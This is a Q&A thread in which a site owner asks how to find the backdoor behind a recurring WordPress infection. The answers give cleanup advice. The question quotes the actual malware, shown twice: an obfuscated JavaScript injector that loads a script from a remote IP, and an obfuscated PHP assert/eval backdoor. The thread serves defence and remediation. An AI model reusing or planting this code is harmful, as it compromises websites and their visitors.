hacked - How to find the backdoor of the hack

Today one of our clients' WordPress sites was hacked which is hosted with amazon aws ubuntu.

Issue is .html

The js code is injected in all js

var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae85](_0xaae84[_0xaae83](_0xaae80)[_0xaae82]()[_0xaae81](_0xaae80))

and in index.php

//###====###
@error_reporting(E_ALL);
@ini_set("error_log",NULL);
@ini_set("log_errors",0);
@ini_set("display_errors", 0);
@error_reporting(0);
$wa = ASSERT_WARNING;
@assert_options(ASSERT_ACTIVE, 1);
@assert_options($wa, 0);
@assert_options(ASSERT_QUIET_EVAL, 1);

$strings = "as"; $strings .= "se";  $strings .= "rt"; $strings2 = "st"; $strings2 .= "r_r";  $strings2 .= "ot13"; $gbz = "riny(".$strings2("base64_decode");
$light =  $strings2($gbz.'("nJLtXPScp3AyqPtxnJW2XFxtrlNtDTIlpz9lK3WypT9lqTyhMluSK0SZGPx7DTyhnI9mMKDbVzEcp3OfLKysMKWlo3WmVvk0paIyXGgNMKWlo3WspzIjo3W0nJ5aXQNcBjccMvtuMJ1jqUxbWS9QG09YFHIoVzAfnJIhqS9wnTIwnlWqXFNzWvOyoKO0rFtxnJW2XFxtrlNxnJW2VQ0tWS9QG09YFHIoVzAfnJIhqS9wnTIwnlWqBlNtMJAbolNxnJW2B30tMJkmMJyzVPuyoKO0rFtxnJW2XFxtrjccMvNbp3Elp3ElXPEsH0IFIxIFJlWVISEDK0uCH1DvKFjtVwRlAl4jVvxcrlEhLJ1yVQ0tWS9GEIWJEIWoVyASHyMSHy9OEREFVy07sJIfp2I7WT5uoJHtCFNxK1ASHyMSHyfvFSEHHS9VG1AHVy07sDbxqKAypzRtCFOcp3AyqPtxK1ASHyMSHyfvFSEHHS9IH0IFK0SUEH5HVy0cC3IloTIhL29xMFtxK1ASHyMSHyfvFSEHHS9IH0IFK0SUEH5HVy0cBvVvBjbxqKWfVQ0tVzu0qUN6Yl9vLKAbp2thpaHiM2I0YaObpQ9cpQ0vYaIloTIhL29xMFtxK1ASHyMSHyfvHxIAG1ESK0SRESVvKFxhVvMxCFVhqKWfMJ5wo2EyXPEhLJ1yYvEsH0IFIxIFJlWFEISIEIAHK1IFFFWqXF4vWaH9Vv4xqKAypzRhVvMcCGRznQ0vYz1xAFtvBQMxZGL3ZQH4LGyuLwN5LmWxAGMvZmL4MQZlMwOyZTHkZFVcBjccMvuzqJ5wqTyioy9yrTymqUZbVzA1pzksnJ5cqPVcXFO7PvEwnPN9VTA1pzksnJ5cqPtxqKWfXGfXL3IloS9mMKEipUDbWTAbYPOQIIWZG1OHK0uSDHESHvjtExSZH0HcB2A1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9QG05BEHAHIRyAEH9IIPjtAFx7VTA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9HFH1SG1IHYPN1XGfXL3IloS9mMKEipUDbWTAbYPOQIIWZG1OHK1WSISIFGyEFDH5GExIFYPOHHyISXGfXWTyvqvN9VTA1pzksMKuyLltxL2tcBlEcozMiVQ0tL3IloS9aMKEcozMiXPEwnPx7nJLtXPEcozMiJlWbqUEjK2AiMTHvKFR9ZwNjXKfxnJW2CFVvB30XL3IloS9woT9mMFtxL2tcBjc9VTIfp2IcMvucozysM2I0XPWuoTkiq191pzksMz9jMJ4vXFN9CFNkXFO7PvEcLaLtCFOznJkyK2qyqS9wo250MJ50pltxqKWfXGfXsDccMvtuMJ1jqUxbWS9DG1AHJlWjVy0cVPLzVT1xAFugMQHbWS9DG1AHJlWjVy0cXFN9CFNvZ2MvAQqvBTLmZmyvZmuzZ2VkLJR1BGEuMwD0AGN0ZTHvXFO7VROyqzSfXUA0pzyjp2kup2uypltxK1OCH1EoVzZvKFxcBlO9PzIwnT8tWTyvqwfXsFO9"));'); $strings($light);
//###====###

Steps I follow:

1. I download all js in local (using command zip -r js_files.zip wp-content -i '*.js') and replace the malicious code using sublime text and upload this.
2. delete the index.php malicious code.

3. block the ip address in .htaccess

   Order Deny,Allow
   Deny from 134.249.116.78
   

4. Change the permission for the folder and files (using .html)

My Question is:

After doing all this, still the code is injected. How I find the back door of the hacker to the site. Please guide me.

Today one of our clients' WordPress sites was hacked which is hosted with amazon aws ubuntu.

Issue is https://blog.sucuri/2016/01/jquery-pastebin-replacement.html

The js code is injected in all js

var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae85](_0xaae84[_0xaae83](_0xaae80)[_0xaae82]()[_0xaae81](_0xaae80))

and in index.php

//###====###
@error_reporting(E_ALL);
@ini_set("error_log",NULL);
@ini_set("log_errors",0);
@ini_set("display_errors", 0);
@error_reporting(0);
$wa = ASSERT_WARNING;
@assert_options(ASSERT_ACTIVE, 1);
@assert_options($wa, 0);
@assert_options(ASSERT_QUIET_EVAL, 1);

$strings = "as"; $strings .= "se";  $strings .= "rt"; $strings2 = "st"; $strings2 .= "r_r";  $strings2 .= "ot13"; $gbz = "riny(".$strings2("base64_decode");
$light =  $strings2($gbz.'("nJLtXPScp3AyqPtxnJW2XFxtrlNtDTIlpz9lK3WypT9lqTyhMluSK0SZGPx7DTyhnI9mMKDbVzEcp3OfLKysMKWlo3WmVvk0paIyXGgNMKWlo3WspzIjo3W0nJ5aXQNcBjccMvtuMJ1jqUxbWS9QG09YFHIoVzAfnJIhqS9wnTIwnlWqXFNzWvOyoKO0rFtxnJW2XFxtrlNxnJW2VQ0tWS9QG09YFHIoVzAfnJIhqS9wnTIwnlWqBlNtMJAbolNxnJW2B30tMJkmMJyzVPuyoKO0rFtxnJW2XFxtrjccMvNbp3Elp3ElXPEsH0IFIxIFJlWVISEDK0uCH1DvKFjtVwRlAl4jVvxcrlEhLJ1yVQ0tWS9GEIWJEIWoVyASHyMSHy9OEREFVy07sJIfp2I7WT5uoJHtCFNxK1ASHyMSHyfvFSEHHS9VG1AHVy07sDbxqKAypzRtCFOcp3AyqPtxK1ASHyMSHyfvFSEHHS9IH0IFK0SUEH5HVy0cC3IloTIhL29xMFtxK1ASHyMSHyfvFSEHHS9IH0IFK0SUEH5HVy0cBvVvBjbxqKWfVQ0tVzu0qUN6Yl9vLKAbp2thpaHiM2I0YaObpQ9cpQ0vYaIloTIhL29xMFtxK1ASHyMSHyfvHxIAG1ESK0SRESVvKFxhVvMxCFVhqKWfMJ5wo2EyXPEhLJ1yYvEsH0IFIxIFJlWFEISIEIAHK1IFFFWqXF4vWaH9Vv4xqKAypzRhVvMcCGRznQ0vYz1xAFtvBQMxZGL3ZQH4LGyuLwN5LmWxAGMvZmL4MQZlMwOyZTHkZFVcBjccMvuzqJ5wqTyioy9yrTymqUZbVzA1pzksnJ5cqPVcXFO7PvEwnPN9VTA1pzksnJ5cqPtxqKWfXGfXL3IloS9mMKEipUDbWTAbYPOQIIWZG1OHK0uSDHESHvjtExSZH0HcB2A1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9QG05BEHAHIRyAEH9IIPjtAFx7VTA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9HFH1SG1IHYPN1XGfXL3IloS9mMKEipUDbWTAbYPOQIIWZG1OHK1WSISIFGyEFDH5GExIFYPOHHyISXGfXWTyvqvN9VTA1pzksMKuyLltxL2tcBlEcozMiVQ0tL3IloS9aMKEcozMiXPEwnPx7nJLtXPEcozMiJlWbqUEjK2AiMTHvKFR9ZwNjXKfxnJW2CFVvB30XL3IloS9woT9mMFtxL2tcBjc9VTIfp2IcMvucozysM2I0XPWuoTkiq191pzksMz9jMJ4vXFN9CFNkXFO7PvEcLaLtCFOznJkyK2qyqS9wo250MJ50pltxqKWfXGfXsDccMvtuMJ1jqUxbWS9DG1AHJlWjVy0cVPLzVT1xAFugMQHbWS9DG1AHJlWjVy0cXFN9CFNvZ2MvAQqvBTLmZmyvZmuzZ2VkLJR1BGEuMwD0AGN0ZTHvXFO7VROyqzSfXUA0pzyjp2kup2uypltxK1OCH1EoVzZvKFxcBlO9PzIwnT8tWTyvqwfXsFO9"));'); $strings($light);
//###====###

Steps I follow:

1. I download all js in local (using command zip -r js_files.zip wp-content -i '*.js') and replace the malicious code using sublime text and upload this.
2. delete the index.php malicious code.

3. block the ip address in .htaccess

   Order Deny,Allow
   Deny from 134.249.116.78
   

4. Change the permission for the folder and files (using http://docs.aws.amazon/AWSEC2/latest/UserGuide/hosting-wordpress.html)

My Question is:

After doing all this, still the code is injected. How I find the back door of the hacker to the site. Please guide me.

• hacked

Share Improve this question edited Feb 11, 2017 at 12:54 cjbj 15k1616 gold badges4242 silver badges8989 bronze badges asked Feb 11, 2017 at 6:52 Tamil Selvan CTamil Selvan C 39777 silver badges2222 bronze badges 2

• When the actual site once has been compromised the backdoor might as well be hiding inside the database or/and in some random location in the filesystem. I would suggest to make a clean wordpress install and also reinstall any third party plugins and themes. Of course you first need to backup your uploads folder and database. Then I would go through both the database and the current theme and look for any modifications. – Cyclonecode Commented Feb 11, 2017 at 12:31
• Except that there might be compromised files even inside the uploads folder (I've seen them). And in the root. Or in any subdomains/add-on domains that are on the same host. You can do a clean WP install, but still have compromised files on your system. Only a full inspection of all files will ensure any malware is gone. And that includes hidden files (htaccess), ICO files that aren't really ICO files, and more. And, even in the database. – Rick Hellewell Commented Oct 16, 2019 at 1:40

Add a comment  | 

3 Answers 3

Sorted by: Reset to default 4

With steps 1 and 2 you are only removing the symptoms of the infection, not the infection itself. Blockings access and changing permission (steps 3 and 4) makes a difference for outside approach of your system. But the infection is already inside your site. So, with these steps you do nothing to remove the infection.

The infection can be anywhere: in your theme, some plugin, hidden in the database, in WordPress core, you name it. The most fool proof way to approach this is to wipe the site entirely and install a backup. Else, you'll have to go through a lengthy process.

The backdoor is most likely located in the theme's functions.php file.Look through it and you will find the answer I believe.

WordPress core is so rarely compromised.This must be caused by a malicious theme.

If you are looking for where the hack came from, you'll have to dig into your access logs. Not an easy thing.

I'd do the following basic steps

• backup everything to local computer
• reinstall WP via the Dashboard/Update page
• reload all themes (either manually, or by deleting the theme and reinstalling). A manual download-to-local-computer, then upload to theme folder (perhaps after deleting the files in the theme folder) might keep all settings
• do the same for all plugins (manual or deactivate-delete-reinstall); again, the manual process might preserve plugin settings
• check for any extra files in all folders (updated files will have the same timestamp, so look for files outside the reinstall date/time). Delete any 'extra' files.

There may be some damage in your database, so you could restore a backup copy of the database (you've made backups, right?).

Some hosts will restore a complete site backup; they might keep several recent backups. This will destroy any updated content/etc, so you may want to reinstall WP and themes and plugins anyway. Some hosts might have a backup copy of the database they could install.

Good luck.

Added These are not all of the steps I use; my process is here: https://securitydawg/recovering-from-a-hacked-wordpress-site/ . Even core files can be compromised - I've seen it on one site I'm still working on (multiple add-on domains, some WP, some not, which makes it harder).